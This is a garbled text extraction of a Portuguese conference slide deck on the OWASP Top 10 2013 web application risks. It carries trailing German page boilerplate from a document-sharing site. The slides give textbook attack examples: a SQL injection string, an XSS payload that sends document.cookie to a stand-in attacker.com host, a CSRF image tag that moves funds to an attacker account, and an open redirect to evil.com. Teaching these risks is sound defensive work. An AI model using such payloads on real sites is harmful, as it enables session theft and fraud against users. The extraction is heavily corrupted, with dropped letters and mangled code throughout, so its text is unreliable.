Owasp2013 130703131006 Phpapp01 PDF

Segurana em aplicaes web
bit.ly/owasp-fisl14
1
Segurana em
Aplicaes Web
conforme
Fabiano Castro Pereira fabianocp@gmail.com
Apresentao ispon!"el em http://bit.ly/owasp-fisl14
bit.ly/owasp-fisl14
#
$%AS& $pen %eb Application Security &ro'ect
(omuniae aberta www.owasp.org
A'uar a esen"ol"er/comprar/manter software seguro)
*erramentas e pares abertos
+i"ros gratuitos) esen"ol"imento/testes/re"iso seguros
,ibliotecas e controles e segurana
-eali.ao e e"entos
+istas e e-mail
Sem presses comerciais
Fundao OW!P
bit.ly/owasp-fisl14
/
$%AS& - &ro'eto 0op 11
$b'eti"o
&roblemas relati"amente simples so intoler"#eis
Alertar sobre se$urana e apli%ati#os web
Apresentar os ris%os %r&ti%os 2entena-se '''3 mais comuns
4erses
#11/ 2pe5uenas atuali.aes em #114 e #1163
#111 2priori.ao feita e acoro com riscos3
()1* 2"erso final liberaa 1( de +unho3
7obile Security &ro'ect 2em esen"ol"imento3
bit.ly/owasp-fisl14
4
$%AS& - &ro'eto 0op 11
teno,,,
$%AS& 0op 11 no - checklist
8 apenas o comeo9 : preciso criar um programa amplo para
implantar uma %ultura de se$urana nas aplicaes
Think as an abuser!!! 2pense como um apro"eitaor3
$portuniaes
Aprener com os erros os outros
;<ecuti"os) $eren%ie. os ris%os inerentes =s aplicaes
owasp-topten@lists.owasp.org
bit.ly/owasp-fisl14
>
&ro'eto 0op 11 - ?@meros
,aseao em A datasets e 6 empresas especiali.aas
4 empresas e %onsultoria e. se$urana
/ empresas 5ue prou.em ferra.entas de se$urana
0otali.ano /)).))) registros e "ulnerabiliaes em
(entenas e organi.aes
7ilBares e aplicaes
;scolBa o 0op 11
Selecionaos e priori.aos "ia a"aliao estes milBares e
aos9 e a partir e estimati"as obtias "ia consenso
bit.ly/owasp-fisl14
C
-iscos e Segurana para Aplicaes
bit.ly/owasp-fisl14
6
$%AS& -isD -ating 7etBoology ;lementos o risco
Agentes e ameaa
Eepene a aplicao9 caa organi.ao e"e a"aliar e
ientificar os agentes 5ue poem lBe oferecer ameaa
;<plorabiliae) F"%il / 0-dia / 1if&%il
Fual : a faciliae e se e<plorar a fra5ue.a associaa a
eterminao riscoG
&re"alHncia) 2ar$a.ente difundida / Co.u. / 3n%o.u.
8 comum encontrar a fra5ue.a associaa ao riscoG
bit.ly/owasp-fisl14
A
$%AS& -isD -ating 7etBoology ;lementos o risco
Eetectabiliae) F"%il / 0-dia / 1if&%il
8 fIcil etectar a fra5ue.a associaa ao riscoG
Jmpactos t:cnicos) 4ra#e / 0oderado / 0enor
Fual o impacto t:cnico caso a fra5ue.a associaa a
eterminao risco se'a e<ploraaG
Jmpactos no negKcio
Eepene a aplicao e o negKcio a organi.ao9 5ue e"e
a"aliar e ientificar os impactos
bit.ly/owasp-fisl14
L
A1 - Jn'eo
;lementos o risco
Agente e ameaa
Fual5uer um 5ue possa en"iar aos no confiI"eis
;<plorabiliae) F"%il
Ata5ue reali.ao com te<to for'ao e forma espec!fica
&raticamente 5ual5uer fonte e aos poe ser atacaa
&re"alHncia) Co.u.
;ncontrao em) consultas SF+9 +EA&9 MpatB9 ou ?oSF+N
comanos e S$N parsers M7+9 cabealBos S70&9 argumentos
e programas9 etc.
bit.ly/owasp-fisl14
11
A1 - Jn'eo
;lementos o risco
Eetectabiliae) 0-dia
*Icil e encontrar no cKigo-fonte9 mas if!cil "ia teste
*erramentas tipo Scanners e fuzzers a'uam os atacantes
Jmpacto) 4ra#e
&oe resultar em) pera ou corrupo e aosN negao e
ser"ioN in"aso total e um ser"ior.
Jmpactos no negKcio
(omo ficaria a reputao a empresa se toos e clientes
fossem roubaos9 moificaos ou e<clu!osG
bit.ly/owasp-fisl14
11
A1 - Jn'eo
;<emplo 2SF+ Jn'ection3
Aplicao usa aos no confiI"eis)
String query = "SELECT * FROM accounts WHERE
custID='" request!get"ara#eter$"i%"& "'"'
Atacante moifica o parOmetro no browser
(tt)*++a))!co#+a))+account,ie-.id=' or '1'='1
bit.ly/owasp-fisl14
1#
A# - *alBa e Autenticao e e
Perenciamento e Sesso
;lementos o risco
Agente e ameaa
Fual5uer um 2anQnimo ou possuior e conta3 5ue 5ueira
acessar ine"iamente uma conta e usuIrio na aplicao
;<plorabiliae) 0-dia
Ata5ue utili.a falBas nas funes 2contas e<postas9 senBas9 JE
e sesso3 para se passar por eterminao usuIrio
&re"alHncia) 2ar$a.ente difundida
;ncontrao em sistemas 5ue constru!ram seus prKprios
mecanismos e autenticao
bit.ly/owasp-fisl14
1/
;lementos o risco
;ncontrar esta falBa poe ser if!cil9 pois epene e uma
anIlise a implementao espec!fica
Jmpacto) 4ra#e
$ atacante poe fa.er tuo 5ue a conta atacaa tem
permisso para fa.er
Jmpactos no negKcio
4alor os aos obtios
;<posio p@blica a "ulnerabiliae na organi.ao
bit.ly/owasp-fisl14
14
;<emplo
Bttp)//e<ample.com/sale/saleitemsN+sessionid5
(P)OC(6!712P!89C6:7(6;GestRSawaii
Se o linD for en"iao para algu:m9 a sesso completa o
estarI ino 'unto9 ano acesso a aos sens!"eis
bit.ly/owasp-fisl14
1>
A/ - Jn'eo e scripts "ia outros sites
(Cross-Site Scripting - XSS)
;lementos o risco
Agente e ameaa
Fual5uer um 5ue possa en"iar aos no confiI"eis
Ata5ue reali.ao com te<to for'ao e forma espec!fica
&raticamente 5ual5uer fonte e aos poe ser atacaa
&re"alHncia) 0uito lar$a.ente difundida
$corre 5uano se e<ibe em uma pIgina aos fornecios pelo
usuIrio9 sem 5ue se faa o correto tratamento
bit.ly/owasp-fisl14
1C
;lementos o risco
Eetectabiliae) F"%il
*alBa poe ser encontraa "ia anIlise e cKigo9 ou "ia testes
Jmpacto) 0oderado
Ata5ue poe e<ecutar scripts no na"egaor para) obter
sesses9 mancBar sites9 instalar malware no na"egaor9 etc.
Jmpactos no negKcio
4alor os aos obtios
bit.ly/owasp-fisl14
16
;<emplo
Aplicao usa aos no "aliaos para construir a pIgina)
$String& )age = "/in)ut na#e='cre%itcar%' ty)e='TE0T1
2a3ue='" request!get"ara#eter$"CC"& "'4"'
Atacante moifica o parOmetro (()
'4/scri)t4%ocu#ent!3ocation=
'(tt)*++---!attac5er!co#+cgi67in+coo5ie!cgi.
8oo='+document.cookie/+scri)t4'!
bit.ly/owasp-fisl14
1A
A4 - -eferHncia ireta e insegura para ob'eto
;lementos o risco
Agente e ameaa
TsuIrios 5ue tem acesso parcial a aos o sistema
,asta alterar um parOmetro 5ue faa referHncia ireta a um
ob'eto o sistema
&re"alHncia) Co.u.
Aplicaes web geralmente usam nomes os ientificaores
para fa.er referHncia aos ob'etos
*alBam em "erificar a autori.ao o acesso
bit.ly/owasp-fisl14
1L
;lementos o risco
*alBa poe ser encontraa "ia anIlise e cKigo9 ou "ia testes
Jmpacto) 0oderado
(omprometimento os aos acessaos pela referHncia
insegura9 e<ceto se no Bou"er como prei.er os "alores
Jmpactos no negKcio
4alor os aos obtios
bit.ly/owasp-fisl14
#1
;<emplo
Aplicao usa aos no "aliaos para construir a pIgina)
String query = "SELECT * FROM accts WHERE account = ."'
"re)are%State#ent )st#t =
connection!)re)areState#ent$query 9 : &'
)st#t!setString$ ;9 request.getParameter("acct")&'
Resu3tSet resu3ts = )st#t!e<ecute=uery$ &'
Atacante moifica o parOmetro acct)
(tt)*++e<a#)3e!co#+a))+accountIn8o.acct=notmyacct
bit.ly/owasp-fisl14
#1
A> - (onfiguraes mal feitas e segurana
;lementos o risco
Agente e ameaa
Atacantes anQnimos9 autenticaos9 ou internos
(ontas paro9 pIginas sem uso9 falBas sem patch9 ar5ui"os e
iretKrios esprotegios9 etc.
&re"alHncia) Co.u.
&oe ocorrer em "Irios n!"eis) plataforma9 ser"ior web ou
aplicao9 ,E9 framework9 cKigo customi.ao
bit.ly/owasp-fisl14
##
;lementos o risco
&oem ser encontraas com scanners automati.aos
Jmpacto) 0oderado
Acesso a aos e funcionaliaes no autori.aas
&oe resultar em %o.pro.eti.ento total do siste.a
Jmpactos no negKcio
Eaos roubaos ou moificaos
-ecuperao poe ser muito custosa
bit.ly/owasp-fisl14
#/
;<emplos
(onsole aministrati"o o ser"ior e aplicao ei<ao com
usuIrio e senBa paro
Ser"ior web com listagem e iretKrio ati"aa
esnecessariamente
;<ibio e stack traces no ser"ior e aplicao
Ser"ior e aplicao mantio com aplicati"os e e<emplo
bit.ly/owasp-fisl14
#4
AC - ;<posio e aos sens!"eis
;lementos o risco
Agente e ameaa
Fual5uer um com interesse nos aos9 este'am eles no
ser"ior9 seno transmitios9 ou no na"egaor
;<plorabiliae) 1if&%il
Atacantes no tentam 5uebrar criptografia9 mas roubar
cBa"es9 ou obter os aos iretamente o ser"ior
&re"alHncia) 3n%o.u.
$corrHncias) falta e criptografia9 cBa"es fracas9 cBa"es mal
gerenciaas9 algoritmos e segurana obsoletos
bit.ly/owasp-fisl14
#>
;lementos o risco
?a"egaor) falBa fIcil e etectar9 no e e<plorar 2larga escala3
*alBas no ser"ior) if!ceis e etectar e"io ao acesso limitao
Jmpacto) 4ra#e
Acesso a aos sens!"eis) registros m:icos9 creenciais9 aos pessoais9
cartes e cr:ito9 etc.
Jmpactos no negKcio
Fuais so as penaliaes legais aplicI"eis = organi.ao por ter e<posto
estes aos 2mesmo in"oluntariamente3G
bit.ly/owasp-fisl14
#C
;<emplos e aes inae5uaas
Tsar criptografia automItica o ,E
Arma.enamento feito e forma segura
7as a leitura estI su'eita = in'eo e SF+
;s5uecer e utili.ar SS+ para comunicao
;s5uecer e UsalgarV as senBas os usuIrios
Salted password hashes
bit.ly/owasp-fisl14
#6
A6 - AusHncia e controle e acesso
no n!"el e funo
;lementos o risco
Agente e ameaa
Fual5uer um com interesse nos aos
Alterar T-+ ou parOmetro 5ue H acesso = funes pri"aas
2atacante anQnimo3 ou pri"ilegiaas 2atacante autenticao3
&re"alHncia) Co.u.
Peralmente falta controle e acesso9 e 5uano e<iste9 estI
mal configurao9 ou se es5ueceu e colocI-lo no cKigo
bit.ly/owasp-fisl14
#A
no n!"el e funo
;lementos o risco
A eteco : fIcil9 a parte mais if!cil : ientificar toas as
poss!"eis pIginas 2T-+s3 e funes atacI"eis
Jmpacto) 0oderado
Acesso a funes no autori.aas9 principalmente se forem
funes aministrati"as
Jmpactos no negKcio
4alor os aos obtios
bit.ly/owasp-fisl14
#L
no n!"el e funo
;<emplos
*uno para usuIrio comum
Bttp)//e<ample.com/app/getappJnfo
*uno para aministraores
Bttp)//e<ample.com/app/ad.in<getappJnfo
Se no Bou"er o controle e acesso9 as funes
aministrati"as sero acessaas ine"iamente
bit.ly/owasp-fisl14
/1
AA - -e5uisies for'aas "ia outros sites
2Cross-Site Request Forgery - (S-*3
;lementos o risco
Agente e ameaa
Algu:m 5ue ese'a forar um usuIrio a aplicao a reali.ar
eterminaa ao 5ue beneficie o atacante
Atacante for'a a re5uisio e engana o usuIrio9 fa.eno-o
en"iI-la para a aplicao = partir e outro local
&re"alHncia) Co.u.
Sites 5ue o atacante poe inferir os aos necessIrios
?a"egaores en"iam os cookies e sesso automaticamente
bit.ly/owasp-fisl14
/1
;lementos o risco
A eteco : fIcil9 poeno ser feita tanto "ia testes e
intruso9 5uanto "ia anIlise e cKigo
Jmpacto) 0oderado
&oe resultar em) alterao e contas9 reali.ao e compras9
e 5ual5uer outra funo e<istente na aplicao
Jmpactos no negKcio
Jmagine se no Bou"er como ter certe.a as aes o usuIrio
TsuIrios reclamano e operaes 5ue eles no reali.aram
bit.ly/owasp-fisl14
/#
;<emplos
*uncionaliae normal ispon!"el na aplicao)
Bttp)//e<ample.com/app/transfer*unsGamountR1>11
WestinationAccountR4C6/#4/#4/
-e5uisio for'aa pelo atacante)
Ximg srcRYhttp://e=a.ple.%o./app/transferFunds>
a.ount51/))?destination%%ount5atta%@ers%%tAU
witBRY1Y BeigBtRY1Y /Z
bit.ly/owasp-fisl14
//
AL - Tso e componentes
com "ulnerabiliaes conBecias
;lementos o risco
Agente e ameaa
Jnteressaos especificamente em eterminaa aplicao9
ispostos a gastar tempo in"estigano as possibiliaes
Atacante usa proceimento manual9 ou ferramentas e scan
automItico9 para ento customi.ar seu eploit
&re"alHncia) 2ar$a.ente difundida
7uitos esen"ol"eores no atuali.am componentes9 e =s
"e.es nem sabem 5uais 5ue so utili.aos
bit.ly/owasp-fisl14
/4
;lementos o risco
Eetectabiliae) 1if&%il
A eteco : if!cil9 pois en"ol"e anIlise minuciosa
EepenHncia entre componentes sK piora as coisas
Jmpacto) 0oderado
&oe ser"ir e ponto e entraa para as outras fra5ue.as
Jmpacto poe ir e .ero at: o comprometimento total
Jmpactos no negKcio
SerI e acoro com a fra5ue.a e<ploraa
bit.ly/owasp-fisl14
/>
;<emplos 2com ## milBes e ownloas em #1113
ApacBe (M* AutBentication ,ypass 2(4;-#11#-/4>13
*rameworD e ser"ios web
?o fornecia token e ientiae9 permitino a atacantes
e<ecutar 5ual5uer ser"io com total permisso
Spring -emote (oe ;<ecution 2Jnfosecurity 7aga.ine3
&roblemas na implementao e !pression "anguage 2;+3
&ermitia e<ecuo e cKigo arbitrIrio9 cBegano a
comprometer completamente o ser"ior
bit.ly/owasp-fisl14
/C
A11 - -eirecionamentos e
encaminBamentos no "aliaos
;lementos o risco
Agente e ameaa
Algu:m 5ue ese'a forar um usuIrio a aplicao a reali.ar
eterminaa ao 5ue beneficie o atacante
Atacante cria um lin@ #"lido9 mas ireto9 sem antes passar
pelo reirecionamento ou encaminBamento necessIrio
&re"alHncia) 3n%o.u.
Eestinos efinios "ia parOmetro sem "aliao
bit.ly/owasp-fisl14
/6
;lementos o risco
-eirecionamentos no "aliaos so fIceis e se etectar9
por:m os encaminBamentos so mais if!ceis
Jmpacto) 0oderado
Atacante poe) instalar malware9 obter senBas ou outras
informaes sens!"eis9 burlar controle e acesso
Jmpactos no negKcio
&era a confiana os usuIrios
$ 5ue aconteceria se atacantes acessassem aos internosG
bit.ly/owasp-fisl14
/A
;<emplos
-eirecionamento malicioso
Bttp)//www.e<ample.com/reirect.'spGurlRe"il.com
;ncaminBamento malicioso
Bttp)//www.e<ample.com/boring.'spGfwRamin.'sp
bit.ly/owasp-fisl14
/L
0em mais coisa no 0op 11
A'ua
(omo "erificar se minBa aplicao : "ulnerI"elG
(omo posso pre"enir a ocorrHncia os riscosG
-eferHncias para mais informaes
$ 5ue "em epois
&ara esen"ol"eores
&ara "erificaores 2"ai al:m e testes3
&ara organi.aes
bit.ly/owasp-fisl14
41
Fabiano Castro Pereira fabianocp@gmail.com
Apresentao ispon!"el em http://bit.ly/owasp-fisl14
&erguntasG

Owasp2013 130703131006 Phpapp01 PDF

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Owasp2013 130703131006 Phpapp01 PDF

Hochgeladen von

Copyright:

Verfügbare Formate

Segurana em aplicaes web

Das könnte Ihnen auch gefallen